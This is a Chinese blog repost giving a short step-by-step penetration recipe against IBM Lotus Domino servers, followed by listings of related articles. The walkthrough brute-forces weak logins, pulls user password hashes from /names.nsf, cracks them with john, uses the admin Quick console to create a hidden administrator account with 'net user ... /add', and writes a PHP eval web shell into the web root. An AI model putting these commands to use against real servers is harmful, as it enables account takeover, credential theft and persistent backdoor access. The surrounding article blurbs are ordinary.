Domino 渗透相关

最新推荐文章于 2022-02-06 01:28:43 发布
最新推荐文章于 2022-02-06 01:28:43 发布
阅读量519 收藏
点赞数
原文链接:http://www.cnblogs.com/t1ny/p/10678926.html
版权
BURP抓包,暴力破解弱口令账户或者尝试admin/password
登录弱口令账户以后,访问 /names.nsf  /webadmin.nsf /admin4.nsf
读取所有用户HASH与NSF文件
读取HASH地址为:/names.nsf/$users?OpenView&Start=1&count=292
 
保存格式为 用户名:hash (不包含括号)
使用kali里面的john 破解hash 
 
john hash文件 --format=lotus5 
或者
john hash文件 --format=dominosec
 
命令执行
 
使用管理员权限用户访问/webadmin.nsf记住文件目录位置,然后访问 Quick console 
 
输入load cmd /c net user wooyun$ Wooyun@2016 /add > D:\lotus_xlgg\Domino\Data\domino\html\download\filesets\netuser1.txt
 
load cmd /c net localgroup administrators wooyun$ /add > D:\lotus_xlgg\Domino\Data\domino\html\download\filesets\netuser1.txt
 
http://网站/download/filesets/ipconfig.txt
 
写shell
 
load cmd /c echo ^<?php @eval($_POST['pass']);? ^ > > D:\Lotus\Domino\data\domino\html\download\filesets\netuser1.php

 

 

 
 
 
 
 
 

转载于:https://www.cnblogs.com/t1ny/p/10678926.html

aelpppqh450447
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
domino agent中createobject问题_请更新Notes客户机和Domino服务器补丁!
weixin_31720227的博客
12-31 120
大家好,才是真的好。好久没写Notes和Domino的安全漏洞问题,因为很多年过去了,发现的漏洞不多,更新的补丁不少。第一个是Notes客户机的安全漏洞Notes客户端的输入参数处理中的漏洞可能被攻击者利用,从而导致缓冲区溢出。这可能使攻击者能够使HCL Notes崩溃或在客户端上执行攻击者控制的代码。是不是很懵,对吧?懵就对了,我来解释一下。这意思是说,某些版本Notes容易受到存储...
Lotus Domino Server有关服务器ID文件过期解决方法.doc
11-14
Lotus Domino Server是一款强大的协作软件平台,它主要用于电子邮件、日历、文档管理以及应用程序开发。在运行过程中,服务器的身份验证依赖于一个称为服务器ID文件的重要安全组件。本文将深入探讨当这个ID文件过期...
关于Lotus Domino平台安全漏洞的整改手册.doc
07-26
近日,国家有关部门对美国IBM公司Lotus Domino/Notes 群件(简称Domino群件)平台密码散列泄露漏洞进行了分析,认为攻击者利用该漏洞可以还原强度不足的所有用户密码,从而可以取得相关用户的全部信息。鉴于协同办公系统是采用Domino平台开发,也可能遭受来自内网的攻击而带来严重的失泄密隐患。对于这一情况特制定以下措施来避免因domino漏洞造成协同办公的安全问题。
IBM+Lotus+Domino技术知识文档汇总(全)
04-10
IBM+Lotus+Domino技术知识文档汇总(全)
domino的names.nsf使用代理批量更改属性(以Format preference for incoming mail属性为例)
jacky的专栏
05-21 2128
1、退出domino服务 2、使用designer打开Z盘下domino的names.nsf文件 3、打开names.nsf数据库----代理---新建代理 4、输入代理名称:mime format,类型我们选择公式,确定后,在打开的窗口右边代码窗口中输入: FIELD MessageStorage:="2"; SELECT @All 5、关闭并保存 6、重新运行domi
快速修改Domino用户 http密码(一)
weixin_33859844的博客
11-27 825
作为一个Domino的管理员,日常最基本的工作就是创建、删除、密码重置工作,前期我已经实现了批量删除用户的操作,今天主要介绍如何快速重置Domino用户的Http密码; 那什么叫快速呢,当然有很多人理解快速的概念就是立刻、马上,但是今天来做的是5分钟的时间称呼快速,因为我们大家都知道如果环境内有多台Domino服务器的话,然后有很多用户注册在不同的服务器...
配置Domino服务器详细步骤分享
09-30
配置Domino服务器是一个关键的任务,涉及到企业内部协作与通信的顺畅。本文主要讲解两种服务器配置方式:新建服务器和删除重装。以下详细说明这两种方法以及配置过程中涉及的主要步骤和参数设置。 1. 配置新的...
Domino Formula @Functions
08-14
本文将深入探讨Domino Formula中的@Functions,以及与之相关的数据类型、数据库操作、国际化、邮件处理和DDE(动态数据交换)功能。 首先,@Functions是Domino Formula语言的核心部分,它们提供了丰富的内置函数,...
domino通过lotusscript解析xml
03-03
标签中提到了"domino 代理 lotusscript ls 解析xml",这表明这个话题可能与Lotus Domino的代理(Agent)有关。在Lotus Domino中,代理是一种自动执行任务的程序,通常由定时器触发或手动启动。使用Lotusscript编写...
IBM 关于Lotus Domino HTTP 密码散列安全
04-08
本文档是lotus Domino 目录中存储的HTTP密码散列的安全技术说明
【信息收集】渗透测试信息收集的种类及方法(待拆分细化)
Fighting_hawk的博客
02-06 4972
1. 了解信息收集阶段的目的; 2. 掌握信息收集的类型; 3. 掌握不同信息收集的方法。
如何保护Lotus Domino Web服务器
林中随行的博客
02-26 631
保护Lotus Domino Web服务器 原文地址:https://www.ibm.com/developerworks/cn/lotus/tutorials/xpages-themes/ 马修米尔扎和斯科特罗杰斯  2005年7月19日发布 FacebookTwitterLinked InGoogle+E-mail this page 许多客户将Lotus Domino用于其Int...
关于exploit-db上的针对Lotus domino控制台绕过的漏洞的解释
cnbird's blog
12-04 5792
控制台绕过的条件: 1. 安装domino程序 2. 停止当前运行的服务 nserver.exe -c exit 3. 开启domino 控制台(默认启动是没有的)启动方式是 c:\lotus\domin\nserver.exe -jc 4. 验证控制台 c:\lotus\domin\jconsole可以连接到2052端口 5. 利用exploit-db提供的方法渗透即可 参
高屋建瓴之WebMail攻与防
weixin_34124939的博客
03-30 1052
0x01:前言 随着互联网的快速发展,我们的生活与互联网的联系愈加的紧密。各种快捷方便的信息化通信工具渐渐取代了传统的通信方式。微博、QQ、MSN、微信、陌陌,…这样的社交软件和平台已经成为了我们生活必不可少的通讯和交友平台。 但是像上述的这些软件及平台都有一个共同的特征,那就是即时性。即时性的通信虽然有其独特的优点所在但是在企业级方面的安全性却得不到全方面的保障;电子邮件却恰恰相反,虽...
保证 IBM Lotus Domino Web 服务器的安全
林中随行的博客
02-28 537
原文:https://www.ibm.com/developerworks/cn/lotus/dominowebserver-study/ domino记录所有http请求和分析用户活动记录 等特殊日志,(需要单独开启)
metasploit的模块构成及功能分析
热门推荐
xysoul的专栏
04-07 1万+
metasploit的模块构成及功能分析 今天我们介绍一下metasploit的基础架构和 市面上介绍metasploit的书不少,网上metasploit的使用说明的文章更是满天飞,可是没有哪一本书或者哪一篇文章来介绍metasploit的目录结构和他的功能,今天我们就来介绍一下metasploit的文件结构和每个部分的功能以及参数。 exploit@ubuntu:/pentest/f
lotus domino_保护IBM Lotus Domino Web服务器的安全:案例研究
cuyi7076的博客
06-24 1262
许多客户在其Intranet或Internet网站中使用IBM Lotus Domino。 在这些环境中保护Domino服务器对于确保数据的完整性和网站(尤其是Internet)的可用性非常重要。 我们先前的developerWorks Lotus文章“ 保护Domino Web服务器的安全”讨论了Domino安全模型以及如何在Web认证,服务器安全和数据安全方面保护Web服务器的安全。 在本...
Lotus Domino 7.0 安装教程
"本文档是一份关于Lotus Domino 7.0服务器的安装教程,详细讲述了安装过程中的每一步,包括从IBM网站下载软件、解压缩、安装程序的启动以及安装选项的选择。文中还提到了Java在Lotus Domino 7.0中的重要性,并建议...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值